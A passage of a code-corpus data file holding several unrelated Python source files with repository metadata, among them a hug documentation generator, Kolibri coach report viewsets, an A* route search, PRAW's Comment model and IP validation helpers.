                if version is None:
                    applies_to = method_versions
                else:
                    applies_to = (version, )
                for version in applies_to:
                    if api_version and version != api_version:
                        continue
                    doc = documentation['versions'][version].setdefault(url, OrderedDict())
                    doc = doc.setdefault(method, OrderedDict())

                    usage = handler.api_function.__doc__
                    if usage:
                        doc['usage'] = usage
                    for example in handler.examples:
                        example_text = "{0}{1}{2}".format(base_url, '/v{0}'.format(version) if version else '', url)
                        if isinstance(example, str):
                            example_text += "?{0}".format(example)
                        doc_examples = doc.setdefault('examples', [])
                        if example_text not in doc_examples:
                            doc_examples.append(example_text)
                    doc['outputs'] = OrderedDict(format=handler.output_format.__doc__,
                                                 content_type=handler.content_type)

                    # 'request'/'response' and 'hug_*' parameters are injected
                    # by the framework and are not user-facing inputs.
                    parameters = [param for param in handler.accepted_parameters
                                  if param not in ('request', 'response')
                                  and not param.startswith('hug_')]
                    if parameters:
                        inputs = doc.setdefault('inputs', OrderedDict())
                        types = handler.api_function.__annotations__
                        for argument in parameters:
                            input_definition = inputs.setdefault(argument, OrderedDict())
                            input_definition['type'] = types.get(argument, hug.types.text).__doc__
                            default = handler.defaults.get(argument, None)
                            if default is not None:
                                input_definition['default'] = default

    if len(documentation['versions']) == 1:
        # Single version: hoist its contents to the top level.
        documentation.update(tuple(documentation['versions'].values())[0])
        documentation.pop('versions')
    else:
        documentation['versions'].pop(None, '')
    return documentation
| 50.325581 | 117 | 0.597043 | """hug/documentation.py
Defines tools that automate the creation of documentation for an API build using the Hug Framework
Copyright (C) 2015 Timothy Edmund Crosley
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
from collections import OrderedDict
import hug.types
def generate(module, base_url="", api_version=None):
    '''Generates documentation based on a Hug API module, base_url, and api_version (if applicable).

    Returns an OrderedDict with an optional 'overview' (the module docstring)
    and, per version / route / HTTP method: usage, examples, outputs, and the
    accepted inputs with their types and defaults.
    '''
    documentation = OrderedDict()
    overview = module.__doc__
    if overview:
        documentation['overview'] = overview
    documentation['versions'] = OrderedDict()
    versions = module.__hug__.versions
    for version in (api_version, ) if api_version else versions:
        documentation['versions'][version] = OrderedDict()
    for url, methods in module.__hug__.routes.items():
        for method, versions in methods.items():
            for version, handler in versions.items():
                # A handler registered without an explicit version applies to
                # every version this route exposes.
                if version is None:
                    applies_to = versions
                else:
                    applies_to = (version, )
                for version in applies_to:
                    if api_version and version != api_version:
                        continue
                    doc = documentation['versions'][version].setdefault(url, OrderedDict())
                    doc = doc.setdefault(method, OrderedDict())
                    usage = handler.api_function.__doc__
                    if usage:
                        doc['usage'] = usage
                    for example in handler.examples:
                        example_text = "{0}{1}{2}".format(base_url, '/v{0}'.format(version) if version else '', url)
                        if isinstance(example, str):
                            example_text += "?{0}".format(example)
                        doc_examples = doc.setdefault('examples', [])
                        if example_text not in doc_examples:
                            doc_examples.append(example_text)
                    doc['outputs'] = OrderedDict(format=handler.output_format.__doc__,
                                                 content_type=handler.content_type)
                    # Hide the request/response objects and hug-internal
                    # ("hug_"-prefixed) parameters from the public docs.
                    parameters = [param for param in handler.accepted_parameters
                                  if param not in ('request', 'response')
                                  and not param.startswith('hug_')]
                    if parameters:
                        inputs = doc.setdefault('inputs', OrderedDict())
                        types = handler.api_function.__annotations__
                        for argument in parameters:
                            input_definition = inputs.setdefault(argument, OrderedDict())
                            input_definition['type'] = types.get(argument, hug.types.text).__doc__
                            default = handler.defaults.get(argument, None)
                            if default is not None:
                                input_definition['default'] = default
    # With a single version there is no point in nesting: flatten it.
    if len(documentation['versions']) == 1:
        documentation.update(tuple(documentation['versions'].values())[0])
        documentation.pop('versions')
    else:
        documentation['versions'].pop(None, '')
    return documentation
| 0 | 0 | 0 |
c0a073a2a76e8d22abebee5090e5a9a433d0dde2 | 257 | py | Python | src/tests/common_test.py | bronger/bobcat | 93e1cc88069001268824bc832490fd8db178848c | [
"MIT"
] | null | null | null | src/tests/common_test.py | bronger/bobcat | 93e1cc88069001268824bc832490fd8db178848c | [
"MIT"
] | null | null | null | src/tests/common_test.py | bronger/bobcat | 93e1cc88069001268824bc832490fd8db178848c | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os.path
testmodules_path = os.path.dirname(os.path.abspath(__file__))
rootpath = os.path.split(testmodules_path)[0]
sys.path.append(rootpath)
| 23.363636 | 61 | 0.735409 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os.path
# Absolute directory that contains this test module.
testmodules_path = os.path.dirname(os.path.abspath(__file__))
# Project root = parent of the test directory; added to sys.path so the
# modules under test can be imported regardless of the current directory.
rootpath = os.path.split(testmodules_path)[0]
sys.path.append(rootpath)
def chdir_to_testbed():
    """Switch the process working directory to the test-module directory."""
    target_dir = testmodules_path
    os.chdir(target_dir)
| 33 | 0 | 23 |
a5e4382e2fe1aea2bd047a8db71a62a40e246774 | 476 | py | Python | kattis/k_apaxiaaans.py | ivanlyon/exercises | 0792976ae2acb85187b26a52812f9ebdd119b5e8 | [
"MIT"
] | null | null | null | kattis/k_apaxiaaans.py | ivanlyon/exercises | 0792976ae2acb85187b26a52812f9ebdd119b5e8 | [
"MIT"
] | null | null | null | kattis/k_apaxiaaans.py | ivanlyon/exercises | 0792976ae2acb85187b26a52812f9ebdd119b5e8 | [
"MIT"
] | null | null | null | '''
No problem, just process
Status: Accepted
'''
###############################################################################
def main():
"""Read input and print output"""
result = ''
for i in input():
if result:
if i != result[-1]:
result += i
else:
result = i
print(result)
###############################################################################
if __name__ == '__main__':
main()
| 19.04 | 79 | 0.315126 | '''
No problem, just process
Status: Accepted
'''
###############################################################################
def main():
    """Read one line from stdin and print it with consecutive duplicate characters collapsed."""
    from itertools import groupby
    # groupby yields one (char, run) pair per maximal run of equal
    # characters, so keeping only the keys removes consecutive duplicates —
    # the stdlib equivalent of the original hand-rolled loop.
    print(''.join(char for char, _ in groupby(input())))
###############################################################################
if __name__ == '__main__':
main()
| 0 | 0 | 0 |
1b985080d7fa8e77186bd6fbe6fb9bd100a355a6 | 386 | py | Python | lab5/DeanerySystem/day.py | R3zn0w/blue-rapier | 84cdc33e1e327c0a402a4d2e29a8d6f5cda95e9b | [
"MIT"
] | null | null | null | lab5/DeanerySystem/day.py | R3zn0w/blue-rapier | 84cdc33e1e327c0a402a4d2e29a8d6f5cda95e9b | [
"MIT"
] | null | null | null | lab5/DeanerySystem/day.py | R3zn0w/blue-rapier | 84cdc33e1e327c0a402a4d2e29a8d6f5cda95e9b | [
"MIT"
] | null | null | null | from enum import Enum
| 15.44 | 43 | 0.443005 | from enum import Enum
class Day(Enum):
    """Days of the week, numbered 1 (Monday) through 7 (Sunday)."""

    MON = 1
    TUE = 2
    WED = 3
    THU = 4
    FRI = 5
    SAT = 6
    SUN = 7

    def difference(self, day):
        """Signed shortest distance in days from self to day, in [-3, 3]."""
        # Fold the raw gap into the [-3, 3] window with modular arithmetic
        # instead of explicit wrap-around branches.
        return (day.value - self.value + 3) % 7 - 3
def nthDayFrom(n, day):
    """Return the Day reached n days after the given day, wrapping the week."""
    shifted = day.value + (n - 1)
    return Day(shifted % 7 + 1)
| 210 | 106 | 46 |
8310fa13339108f5a042b8ebfc3966a35442df24 | 6,667 | py | Python | kolibri/plugins/coach/api.py | bonidjukic/kolibri | bbc6266b02da0cba7cb94c6eeb1b66d5e31d47f5 | [
"MIT"
] | null | null | null | kolibri/plugins/coach/api.py | bonidjukic/kolibri | bbc6266b02da0cba7cb94c6eeb1b66d5e31d47f5 | [
"MIT"
] | 3 | 2016-05-24T21:12:01.000Z | 2017-03-09T22:43:08.000Z | kolibri/plugins/coach/api.py | DXCanas/kolibri | 4571fc5e5482a2dc9cd8f93dd45222a69d8a68b4 | [
"MIT"
] | null | null | null | import datetime
from dateutil.parser import parse
from django.db import connection
from django.db.models import Min
from django.db.models import Q
from django.utils import timezone
from rest_framework import mixins
from rest_framework import pagination
from rest_framework import permissions
from rest_framework import viewsets
from .serializers import ContentReportSerializer
from .serializers import ContentSummarySerializer
from .serializers import LessonReportSerializer
from .serializers import UserReportSerializer
from .utils.return_users import get_members_or_user
from kolibri.core.auth.constants import collection_kinds
from kolibri.core.auth.constants import role_kinds
from kolibri.core.auth.models import Collection
from kolibri.core.auth.models import FacilityUser
from kolibri.core.content.models import ContentNode
from kolibri.core.decorators import query_params_required
from kolibri.core.lessons.models import Lesson
from kolibri.core.logger.models import ContentSummaryLog
from kolibri.core.logger.models import MasteryLog
collection_kind_choices = tuple([choice[0] for choice in collection_kinds.choices] + ['user'])
class OptionalPageNumberPagination(pagination.PageNumberPagination):
"""
Pagination class that allows for page number-style pagination, when requested.
To activate, the `page_size` argument must be set. For example, to request the first 20 records:
`?page_size=20&page=1`
"""
page_size = None
page_size_query_param = "page_size"
# check if requesting user has permission for collection or user
@query_params_required(channel_id=str, content_node_id=str, collection_kind=collection_kind_choices, collection_id=str)
@query_params_required(channel_id=str, collection_kind=collection_kind_choices, collection_id=str)
| 45.664384 | 122 | 0.744563 | import datetime
from dateutil.parser import parse
from django.db import connection
from django.db.models import Min
from django.db.models import Q
from django.utils import timezone
from rest_framework import mixins
from rest_framework import pagination
from rest_framework import permissions
from rest_framework import viewsets
from .serializers import ContentReportSerializer
from .serializers import ContentSummarySerializer
from .serializers import LessonReportSerializer
from .serializers import UserReportSerializer
from .utils.return_users import get_members_or_user
from kolibri.core.auth.constants import collection_kinds
from kolibri.core.auth.constants import role_kinds
from kolibri.core.auth.models import Collection
from kolibri.core.auth.models import FacilityUser
from kolibri.core.content.models import ContentNode
from kolibri.core.decorators import query_params_required
from kolibri.core.lessons.models import Lesson
from kolibri.core.logger.models import ContentSummaryLog
from kolibri.core.logger.models import MasteryLog
collection_kind_choices = tuple([choice[0] for choice in collection_kinds.choices] + ['user'])
class OptionalPageNumberPagination(pagination.PageNumberPagination):
    """
    Pagination class that allows for page number-style pagination, when requested.
    To activate, the `page_size` argument must be set. For example, to request the first 20 records:
    `?page_size=20&page=1`
    """
    # No default page size: responses stay unpaginated unless the client opts in.
    page_size = None
    page_size_query_param = "page_size"
class KolibriReportPermissions(permissions.BasePermission):
    """Grant access to coach reports only to admins/coaches of the target collection or user."""

    # check if requesting user has permission for collection or user
    def has_permission(self, request, view):
        """Return True when request.user holds an ADMIN or COACH role for the target.

        For lesson report views the target collection is derived from the
        lesson itself (detail view) or the requester's whole facility (list
        view); for every other report view it comes from the URL kwargs.
        Returns False when the referenced user/collection does not exist.
        """
        if isinstance(view, LessonReportViewset):
            report_pk = view.kwargs.get('pk', None)
            if report_pk is None:
                # If requesting list view, check if requester has coach/admin permissions on whole facility
                collection_kind = 'facility'
                collection_or_user_pk = request.user.facility_id
            else:
                # If requesting detail view, only check if requester has permissions on the Classroom
                collection_kind = 'classroom'
                collection_or_user_pk = Lesson.objects.get(pk=report_pk).collection.id
        else:
            collection_kind = view.kwargs.get('collection_kind', 'user')
            collection_or_user_pk = view.kwargs.get('collection_id', view.kwargs.get('pk'))
        allowed_roles = [role_kinds.ADMIN, role_kinds.COACH]
        try:
            if 'user' == collection_kind:
                return request.user.has_role_for(allowed_roles, FacilityUser.objects.get(pk=collection_or_user_pk))
            else:
                return request.user.has_role_for(allowed_roles, Collection.objects.get(pk=collection_or_user_pk))
        except (FacilityUser.DoesNotExist, Collection.DoesNotExist):
            return False
@query_params_required(channel_id=str, content_node_id=str, collection_kind=collection_kind_choices, collection_id=str)
class ReportBaseViewSet(mixins.ListModelMixin, viewsets.GenericViewSet):
    """List-only base for coach reports; the decorator enforces the required query params."""
    permission_classes = (KolibriReportPermissions,)
class UserReportViewSet(ReportBaseViewSet):
    """Report over the members of a collection (a collection, never a single user)."""

    pagination_class = OptionalPageNumberPagination
    serializer_class = UserReportSerializer

    def get_queryset(self):
        """Return the FacilityUsers belonging to the requested collection."""
        # The original used a bare `assert`, which is silently stripped under
        # `python -O`; raise explicitly so the guard always runs.
        # AssertionError is kept for backward compatibility with callers.
        if self.kwargs['collection_kind'] == 'user':
            raise AssertionError('only a `collection` should be passed to this endpoint')
        return get_members_or_user(self.kwargs['collection_kind'], self.kwargs['collection_id'])
class ContentReportViewSet(ReportBaseViewSet):
    """Report of the direct children of a content node."""
    pagination_class = OptionalPageNumberPagination
    serializer_class = ContentReportSerializer
    def get_queryset(self):
        """Return available ContentNodes whose parent is the requested node, in tree order."""
        content_node_id = self.kwargs['content_node_id']
        return ContentNode.objects.filter(Q(parent=content_node_id) & Q(available=True)).order_by('lft')
@query_params_required(channel_id=str, collection_kind=collection_kind_choices, collection_id=str)
class ContentSummaryViewSet(viewsets.ReadOnlyModelViewSet):
    """Summary over every available node of a channel (read-only)."""
    permission_classes = (KolibriReportPermissions,)
    serializer_class = ContentSummarySerializer
    def get_queryset(self):
        """Return all available ContentNodes of the requested channel, in tree order."""
        channel_id = self.kwargs['channel_id']
        return ContentNode.objects.filter(Q(channel_id=channel_id) & Q(available=True)).order_by('lft')
class RecentReportViewSet(ReportBaseViewSet):
    """Report of content recently worked on by members of a collection.

    "Recent" means a ContentSummaryLog under the requested topic with progress
    (or an attempted mastery log) ending after ``last_active_time`` — by
    default, within the last 7 days.
    """
    pagination_class = OptionalPageNumberPagination
    serializer_class = ContentReportSerializer
    def get_queryset(self):
        """Return ContentNodes with recent activity, one per unique content_id, in tree order."""
        channel_id = self.kwargs['channel_id']
        attempted_mastery_logs = MasteryLog.objects.filter(attemptlogs__isnull=False)
        query_node = ContentNode.objects.get(pk=self.kwargs['content_node_id'])
        if self.request.query_params.get('last_active_time'):
            # Last active time specified
            datetime_cutoff = parse(self.request.query_params.get('last_active_time'))
        else:
            datetime_cutoff = timezone.now() - datetime.timedelta(7)
        # Set on the kwargs to pass into the serializer
        self.kwargs['last_active_time'] = datetime_cutoff.isoformat()
        recent_content_items = ContentSummaryLog.objects.filter_by_topic(query_node).filter(
            Q(progress__gt=0) | Q(masterylogs__in=attempted_mastery_logs),
            user__in=list(get_members_or_user(self.kwargs['collection_kind'], self.kwargs['collection_id'])),
            end_timestamp__gte=datetime_cutoff).values_list('content_id', flat=True)
        if connection.vendor == 'postgresql':
            # DISTINCT ON yields one row per content_id directly.
            pks_with_unique_content_ids = ContentNode.objects.order_by('content_id').distinct('content_id').filter(
                channel_id=channel_id, content_id__in=recent_content_items).values_list('pk', flat=True)
        else:
            # note from rtibbles:
            # As good as either I or jamalex could come up with to ensure that we only return
            # unique content_id'ed ContentNodes from the coach recent report endpoint.
            # Would have loved to use distinct('content_id'), but unfortunately DISTINCT ON is Postgresql only
            pks_with_unique_content_ids = ContentNode.objects.filter(
                channel_id=channel_id, content_id__in=recent_content_items).values('content_id').order_by('lft').annotate(
                pk=Min('pk')).values_list('pk', flat=True)
        return ContentNode.objects.filter(pk__in=pks_with_unique_content_ids).order_by('lft')
class LessonReportViewset(viewsets.ReadOnlyModelViewSet):
    """Read-only lesson reports; per-object access is enforced by KolibriReportPermissions."""
    permission_classes = (permissions.IsAuthenticated, KolibriReportPermissions,)
    serializer_class = LessonReportSerializer
    queryset = Lesson.objects.all()
| 3,724 | 959 | 185 |
0694d04650787688fa74a9c2b1229237ea3faa9f | 2,412 | py | Python | src/student_code.py | azarrias/udacity-nd256-project4 | 295db734b854b477095cf8441498f72ade1ae03c | [
"MIT"
] | null | null | null | src/student_code.py | azarrias/udacity-nd256-project4 | 295db734b854b477095cf8441498f72ade1ae03c | [
"MIT"
] | null | null | null | src/student_code.py | azarrias/udacity-nd256-project4 | 295db734b854b477095cf8441498f72ade1ae03c | [
"MIT"
] | null | null | null | from math import sqrt
from collections import deque
# sort using g + h costs
# implement A* seaarch algorithm
# use euclidean distance to the goal node to determine the h value
# use stack to retrieve elements in reverse order | 37.107692 | 113 | 0.639718 | from math import sqrt
from collections import deque
class Node:
def __init__(self, _id):
self.id = _id
self.parent = None
self.g_value = 0
self.h_value = 0
# sort using g + h costs
def __lt__(self, other):
return self.g_value + self.h_value < other.g_value + other.h_value
def __eq__(self, other):
return self.id == other.id
# implement A* seaarch algorithm
def shortest_path(M, start, goal):
print("shortest path called")
# use min heap for the priority queue
start_node = Node(start)
start_node.g_value = 0
start_node.h_value = euclidean_distance(M, start, goal)
open_set = {}
closed_set = {}
open_set[start] = start_node
while len(open_set) > 0:
current_node = sorted(open_set.values())[0]
if current_node.id == goal:
return calculate_path(current_node, start)
open_set.pop(current_node.id)
closed_set[current_node.id] = current_node
# add neighbours of the current node
for neighbour in M.roads[current_node.id]:
if neighbour in closed_set:
continue
if neighbour in open_set:
neighbour_node = open_set[neighbour]
new_g_val = current_node.g_value + euclidean_distance(M, current_node.id, neighbour)
if new_g_val < neighbour_node.g_value:
neighbour_node.parent = current_node
neighbour_node.g_value = new_g_val
else:
neighbour_node = Node(neighbour)
neighbour_node.parent = current_node
neighbour_node.h_value = euclidean_distance(M, neighbour, goal)
neighbour_node.g_value = current_node.g_value + euclidean_distance(M, current_node.id, neighbour)
open_set[neighbour] = neighbour_node
# use euclidean distance to the goal node to determine the h value
def euclidean_distance(M, node1, node2):
    """Straight-line distance between two intersections of map M (the A* heuristic)."""
    ax, ay = M._graph.node[node1]['pos']
    bx, by = M._graph.node[node2]['pos']
    dx = ax - bx
    dy = ay - by
    return sqrt(dx * dx + dy * dy)
# use stack to retrieve elements in reverse order
def calculate_path(current_node, start_node):
    """Walk parent links from the goal node back to start; return node ids in path order."""
    trail = []
    node = current_node
    while node.id != start_node:
        trail.append(node.id)
        node = node.parent
    trail.append(node.id)
    return trail[::-1]
51d9098bcedee877280944be77e98d7906ec131c | 6,436 | py | Python | venv/lib/python3.5/site-packages/praw/models/reddit/comment.py | cssidy/python-reddit | b9ec30662032993bb55c93aee5e2321fdbd5bf0c | [
"MIT"
] | null | null | null | venv/lib/python3.5/site-packages/praw/models/reddit/comment.py | cssidy/python-reddit | b9ec30662032993bb55c93aee5e2321fdbd5bf0c | [
"MIT"
] | null | null | null | venv/lib/python3.5/site-packages/praw/models/reddit/comment.py | cssidy/python-reddit | b9ec30662032993bb55c93aee5e2321fdbd5bf0c | [
"MIT"
] | null | null | null | """Provide the Comment class."""
from ...const import urljoin
from ...exceptions import ClientException
from ..comment_forest import CommentForest
from .base import RedditBase
from .mixins import InboxableMixin, ThingModerationMixin, UserContentMixin
from .redditor import Redditor
class Comment(RedditBase, InboxableMixin, UserContentMixin):
"""A class that represents a reddit comments."""
STR_FIELD = 'id'
@property
def is_root(self):
"""Return True when the comment is a top level comment."""
parent_type = self.parent_id.split('_', 1)[0]
return parent_type == self._reddit.config.kinds['submission']
@property
def mod(self):
"""An instance of :class:`.CommentModeration`."""
if self._mod is None:
self._mod = CommentModeration(self)
return self._mod
@property
def replies(self):
"""An instance of :class:`.CommentForest`."""
if isinstance(self._replies, list):
self._replies = CommentForest(self.submission, self._replies)
return self._replies
@property
def submission(self):
"""Return the Submission object this comment belongs to."""
if not self._submission: # Comment not from submission
self._submission = self._reddit.submission(
self.link_id.split('_', 1)[1])
return self._submission
@submission.setter
def submission(self, submission):
"""Update the Submission associated with the Comment."""
assert self.name not in submission._comments_by_id
submission._comments_by_id[self.name] = self
self._submission = submission
for reply in getattr(self, 'replies', []):
reply.submission = submission
def __init__(self, reddit, id=None, # pylint: disable=redefined-builtin
_data=None):
"""Construct an instance of the Comment object."""
if bool(id) == bool(_data):
raise TypeError('Either `id` or `_data` must be provided.')
self._mod = self._replies = self._submission = None
super(Comment, self).__init__(reddit, _data)
if id:
self.id = id # pylint: disable=invalid-name
else:
self._fetched = True
def __setattr__(self, attribute, value):
"""Objectify author, replies, and subreddit."""
# pylint: disable=redefined-variable-type
if attribute == 'author':
value = Redditor.from_data(self._reddit, value)
elif attribute == 'replies':
if value == '':
value = []
else:
value = self._reddit._objector.objectify(value).children
attribute = '_replies'
elif attribute == 'subreddit':
value = self._reddit.subreddit(value)
super(Comment, self).__setattr__(attribute, value)
def parent(self):
"""Return the parent of the comment.
The returned parent will be an instance of either
:class:`.Comment`, or :class:`.Submission`.
If this comment was obtained through a :class:`.Submission`, then its
entire ancestry should be immediately available, requiring no extra
network requests. However, if this comment was obtained through other
means, e.g., ``reddit.comment('COMMENT_ID')``, or
``reddit.inbox.comment_replies``, then the returned parent may be a
lazy instance of either :class:`.Comment`, or :class:`.Submission`.
Lazy Comment Example:
.. code:: python
comment = reddit.comment('cklhv0f')
parent = comment.parent()
# `replies` is empty until the comment is refreshed
print(parent.replies) # Output: []
parent.refresh()
print(parent.replies) # Output is at least: [Comment(id='cklhv0f')]
"""
# pylint: disable=no-member
if self.parent_id == self.submission.fullname:
return self.submission
if '_comments' in self.submission.__dict__ \
and self.parent_id in self.submission._comments_by_id:
# The Comment already exists, so simply return it
return self.submission._comments_by_id[self.parent_id]
# pylint: enable=no-member
parent = Comment(self._reddit, self.parent_id.split('_', 1)[1])
parent._submission = self.submission
return parent
def permalink(self, fast=False):
"""Return a permalink to the comment.
:param fast: Return the result as quickly as possible (default: False).
In order to determine the full permalink for a comment, the Submission
may need to be fetched if it hasn't been already. Set ``fast=True`` if
you want to bypass that possible load.
A full permalink looks like:
/r/redditdev/comments/2gmzqe/praw_https_enabled/cklhv0f
A fast-loaded permalink for the same comment will look like:
/comments/2gmzqe//cklhv0f
"""
# pylint: disable=no-member
if not fast or 'permalink' in self.submission.__dict__:
return urljoin(self.submission.permalink, self.id)
return '/comments/{}//{}'.format(self.submission.id, self.id)
def refresh(self):
"""Refresh the comment's attributes.
If using :meth:`.Reddit.comment` this method must be called in order to
obtain the comment's replies.
"""
if 'context' in self.__dict__: # Using hasattr triggers a fetch
comment_path = self.context.split('?', 1)[0]
else:
comment_path = '{}_/{}'.format(
self.submission._info_path(), # pylint: disable=no-member
self.id)
comment_list = self._reddit.get(comment_path)[1].children
if not comment_list:
raise ClientException('Comment has been deleted')
comment = comment_list[0]
for reply in comment._replies:
reply.submission = self.submission
del comment.__dict__['_submission'] # Don't replace
self.__dict__.update(comment.__dict__)
return self
class CommentModeration(ThingModerationMixin):
"""Provide a set of functions pertaining to Comment moderation."""
def __init__(self, comment):
"""Create a CommentModeration instance.
:param comment: The comment to moderate.
"""
self.thing = comment
| 37.202312 | 79 | 0.629117 | """Provide the Comment class."""
from ...const import urljoin
from ...exceptions import ClientException
from ..comment_forest import CommentForest
from .base import RedditBase
from .mixins import InboxableMixin, ThingModerationMixin, UserContentMixin
from .redditor import Redditor
class Comment(RedditBase, InboxableMixin, UserContentMixin):
    """A class that represents a reddit comments."""
    # NOTE(review): presumably tells RedditBase which attribute backs str()
    # and fullname construction -- confirm against RedditBase.
    STR_FIELD = 'id'
    @property
    def is_root(self):
        """Return True when the comment is a top level comment."""
        parent_type = self.parent_id.split('_', 1)[0]
        return parent_type == self._reddit.config.kinds['submission']
    @property
    def mod(self):
        """An instance of :class:`.CommentModeration`."""
        # Created lazily and cached on first access.
        if self._mod is None:
            self._mod = CommentModeration(self)
        return self._mod
    @property
    def replies(self):
        """An instance of :class:`.CommentForest`."""
        if isinstance(self._replies, list):
            self._replies = CommentForest(self.submission, self._replies)
        return self._replies
    @property
    def submission(self):
        """Return the Submission object this comment belongs to."""
        if not self._submission: # Comment not from submission
            self._submission = self._reddit.submission(
                self.link_id.split('_', 1)[1])
        return self._submission
    @submission.setter
    def submission(self, submission):
        """Update the Submission associated with the Comment."""
        assert self.name not in submission._comments_by_id
        submission._comments_by_id[self.name] = self
        self._submission = submission
        # Propagate the new submission down the reply tree.
        for reply in getattr(self, 'replies', []):
            reply.submission = submission
    def __init__(self, reddit, id=None, # pylint: disable=redefined-builtin
                 _data=None):
        """Construct an instance of the Comment object."""
        # Exactly one of `id` and `_data` must be supplied.
        if bool(id) == bool(_data):
            raise TypeError('Either `id` or `_data` must be provided.')
        self._mod = self._replies = self._submission = None
        super(Comment, self).__init__(reddit, _data)
        if id:
            self.id = id # pylint: disable=invalid-name
        else:
            self._fetched = True
    def __setattr__(self, attribute, value):
        """Objectify author, replies, and subreddit."""
        # Every attribute assignment funnels through here, converting raw
        # API values into PRAW model instances on the fly.
        # pylint: disable=redefined-variable-type
        if attribute == 'author':
            value = Redditor.from_data(self._reddit, value)
        elif attribute == 'replies':
            if value == '':
                value = []
            else:
                value = self._reddit._objector.objectify(value).children
            attribute = '_replies'
        elif attribute == 'subreddit':
            value = self._reddit.subreddit(value)
        super(Comment, self).__setattr__(attribute, value)
    def parent(self):
        """Return the parent of the comment.
        The returned parent will be an instance of either
        :class:`.Comment`, or :class:`.Submission`.
        If this comment was obtained through a :class:`.Submission`, then its
        entire ancestry should be immediately available, requiring no extra
        network requests. However, if this comment was obtained through other
        means, e.g., ``reddit.comment('COMMENT_ID')``, or
        ``reddit.inbox.comment_replies``, then the returned parent may be a
        lazy instance of either :class:`.Comment`, or :class:`.Submission`.
        Lazy Comment Example:
        .. code:: python
        comment = reddit.comment('cklhv0f')
        parent = comment.parent()
        # `replies` is empty until the comment is refreshed
        print(parent.replies) # Output: []
        parent.refresh()
        print(parent.replies) # Output is at least: [Comment(id='cklhv0f')]
        """
        # pylint: disable=no-member
        if self.parent_id == self.submission.fullname:
            return self.submission
        if '_comments' in self.submission.__dict__ \
                and self.parent_id in self.submission._comments_by_id:
            # The Comment already exists, so simply return it
            return self.submission._comments_by_id[self.parent_id]
        # pylint: enable=no-member
        # Otherwise build a lazy Comment bound to the same submission.
        parent = Comment(self._reddit, self.parent_id.split('_', 1)[1])
        parent._submission = self.submission
        return parent
    def permalink(self, fast=False):
        """Return a permalink to the comment.
        :param fast: Return the result as quickly as possible (default: False).
        In order to determine the full permalink for a comment, the Submission
        may need to be fetched if it hasn't been already. Set ``fast=True`` if
        you want to bypass that possible load.
        A full permalink looks like:
        /r/redditdev/comments/2gmzqe/praw_https_enabled/cklhv0f
        A fast-loaded permalink for the same comment will look like:
        /comments/2gmzqe//cklhv0f
        """
        # pylint: disable=no-member
        # Use the full URL whenever the submission's permalink is cached.
        if not fast or 'permalink' in self.submission.__dict__:
            return urljoin(self.submission.permalink, self.id)
        return '/comments/{}//{}'.format(self.submission.id, self.id)
    def refresh(self):
        """Refresh the comment's attributes.
        If using :meth:`.Reddit.comment` this method must be called in order to
        obtain the comment's replies.
        """
        if 'context' in self.__dict__: # Using hasattr triggers a fetch
            comment_path = self.context.split('?', 1)[0]
        else:
            comment_path = '{}_/{}'.format(
                self.submission._info_path(), # pylint: disable=no-member
                self.id)
        comment_list = self._reddit.get(comment_path)[1].children
        if not comment_list:
            raise ClientException('Comment has been deleted')
        comment = comment_list[0]
        for reply in comment._replies:
            reply.submission = self.submission
        del comment.__dict__['_submission'] # Don't replace
        self.__dict__.update(comment.__dict__)
        return self
class CommentModeration(ThingModerationMixin):
    """Provide a set of functions pertaining to Comment moderation."""
    def __init__(self, comment):
        """Create a CommentModeration instance.
        :param comment: The comment to moderate.
        """
        # The moderation actions inherited from ThingModerationMixin
        # operate on ``self.thing``.
        self.thing = comment
| 0 | 0 | 0 |
4745880a71149ff8c4b63d9e2ab860d088aa92ed | 1,290 | py | Python | venv/Lib/site-packages/networkutil/validation.py | avim2809/CameraSiteBlocker | bfc0434e75e8f3f95c459a4adc86b7673200816e | [
"Apache-2.0"
] | null | null | null | venv/Lib/site-packages/networkutil/validation.py | avim2809/CameraSiteBlocker | bfc0434e75e8f3f95c459a4adc86b7673200816e | [
"Apache-2.0"
] | null | null | null | venv/Lib/site-packages/networkutil/validation.py | avim2809/CameraSiteBlocker | bfc0434e75e8f3f95c459a4adc86b7673200816e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Description: validation functions
from ipaddress import (AddressValueError, NetmaskValueError,
ip_address, IPv4Address, IPv6Address,
ip_network, IPv4Network, IPv6Network)
| 23.454545 | 73 | 0.53876 | # -*- coding: utf-8 -*-
# Description: validation functions
from ipaddress import (AddressValueError, NetmaskValueError,
ip_address, IPv4Address, IPv6Address,
ip_network, IPv4Network, IPv6Network)
def valid_ip(ip,
             method=ip_address):
    """Return True when *ip* parses as a valid address via *method*.

    *method* may be any ipaddress factory (ip_address, IPv4Address, ...).
    """
    try:
        method(u'{ip}'.format(ip=ip))
        return True
    # AddressValueError is a ValueError subclass, so catching ValueError
    # alone covers every parse failure raised by the ipaddress factories.
    except ValueError:
        return False
def valid_ipv4(ip):
    """Return True when *ip* parses as an IPv4 address."""
    try:
        IPv4Address(u'{ip}'.format(ip=ip))
    except (ValueError, AddressValueError):
        return False
    return True
def valid_ipv6(ip):
    """Return True when *ip* parses as an IPv6 address."""
    try:
        IPv6Address(u'{ip}'.format(ip=ip))
    except (ValueError, AddressValueError):
        return False
    return True
def valid_ip_network(network,
                     method=ip_network,
                     strict=True):
    """Return True when *network* parses as a valid IP network via *method*.

    With strict=True (the default), host bits set in the address make the
    network invalid, matching ipaddress semantics.
    """
    try:
        method(u'{net}'.format(net=network),
               strict=strict)
        return True
